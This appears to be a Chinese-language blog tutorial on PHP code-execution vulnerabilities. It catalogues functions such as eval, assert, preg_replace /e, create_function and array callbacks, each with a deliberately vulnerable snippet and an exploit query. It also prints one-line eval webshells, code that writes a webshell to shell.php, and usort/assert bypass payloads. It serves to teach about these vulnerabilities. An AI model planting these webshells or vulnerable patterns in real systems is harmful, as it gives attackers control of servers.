漏洞形成原因:客户端提交的参数,未经任何过滤,传入可以执行代码的函数,造成代码执行漏洞。 常见代码注射函数:

如:eval、preg\_replace+/e、assert、call\_user\_func、call\_user\_func\_array、create\_function等函数

漏洞危害:执行代码,写入webshell、控制服务器

代码示例一:

```
<?php
//?cmd=phpinfo();
@eval($_GET['cmd']);
?>
```

代码示例二:

```
<?php
//?cmd=${phpinfo()}
$str=$_GET['cmd'];
eval('$str="'.$str.'";');
?>
```

php 代码可以这样在双引号中被执行

代码示例三:

```
<?php
//?cmd=%27);phpinfo();//
$str=$_GET['cmd'];
eval("strtolower('$str');");
?>
```

代码示例四: preg\_replace函数

```
<?php
preg_replace("/<php>(.*?)<\/php>/e", '\1', "<php>phpinfo()</php>");
//等价于
preg_replace("/<php>(.*?)<\/php>/e", '${1}', "<php>phpinfo()</php>");
?>
```

PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。 常见代码执行函数,如

```
eval()、assert()、preg_replace()、create_function()
array_map()、call_user_func()、call_user_func_array(), array_filter, usort, uasort()
文件操作函数、动态函数($a($b))
```

#### 1, eval()

eval() 函数把字符串按照 PHP 代码来计算,如常见的一句话后门程序:

```
<?php eval($_POST[cmd])?>
```

#### 2, assert()

与eval类似,字符串被 assert() 当做 PHP 代码来执行,如:

### 示例代码:

```
<?php
//?cmd=phpinfo()
assert($_REQUEST[cmd]);
?>
```

## 3、preg\_replace()

mixed preg\_replace ( mixed \$pattern , mixed \$replacement , mixed \$subject [, int \$limit = -1 [, int &\$count ]] )

搜索subject中匹配pattern的部分,以replacement进行替换。

preg\_replace()函数原本是执行一个正则表达式的搜索和替换,但因为存在危险的/e修饰符,使 preg\_replace()将 replacement 参数当作 PHP 代码

## 示例代码:

```
<?php
//?cmd=phpinfo()
@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd");
?>
```

## 4、create\_function()

create\_function主要用来创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给create\_function()执行任意命令。

# 代码示例:

```
<?php
//?cmd=phpinfo();
$func =create_function('',$_REQUEST['cmd']);
$func();
?>
```

# 5、array\_map()

array\_map() 函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。 回调函数接受的参数数目应该和传递给 array\_map() 函数的数组数目一致。

代码示例:

```
<?php
//?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?>
```

# 6、call\_user\_func()/call\_user\_func\_array ()

```
call_user_func — 把第一个参数作为回调函数调用,其余参数是回调函数的参数。 call_user_func_array — 调用回调函数 , 并把一个数组参数作为回调函数的参数
```

```
<?php
//?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?>

<?php
//?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>
```

## 7、array\_filter()

array array\_filter ( array \$array [, callable \$callback [, int \$flag = 0 ]] )

依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true ,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

```
<?php
//?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>
```

### 8, usort(), uasort()

usort() 通过用户自定义的比较函数对数组进行排序。

uasort()使用用户自定义的比较函数对数组中的值进行排序并保持索引关联。

代码示例:

```
php环境>=5.6才能用
<?php usort(...$_GET);?>
利用方式:
test.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert
[POST]:x=phpinfo();

php环境>=<5.6才能用
<?php usort($_GET,'asse'.'rt');?>
利用方式:
test.php?1=1+1&2=eval($_POST[x])
[POST]:x=phpinfo();
```

## 9、文件操作函数

file\_put\_contents() 函数把一个字符串写入文件中。

fputs()函数写入文件

代码示例:

```
<?php
$test='<?php eval($_POST[cmd]);?>';
file_put_contents('test1.php',$test);
?>
<?php
fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');
?>
```

## 10、动态函数

PHP函数直接由字符串拼接

代码示例:

```
<?php
//?a=assert&b=phpinfo()
$_GET['a']($_GET['b']);
?>
```

新文章将同步更新到我的个人公众号上,欢迎各位朋友扫描我的公众号二维码关注一下我,随时获取最新动态。

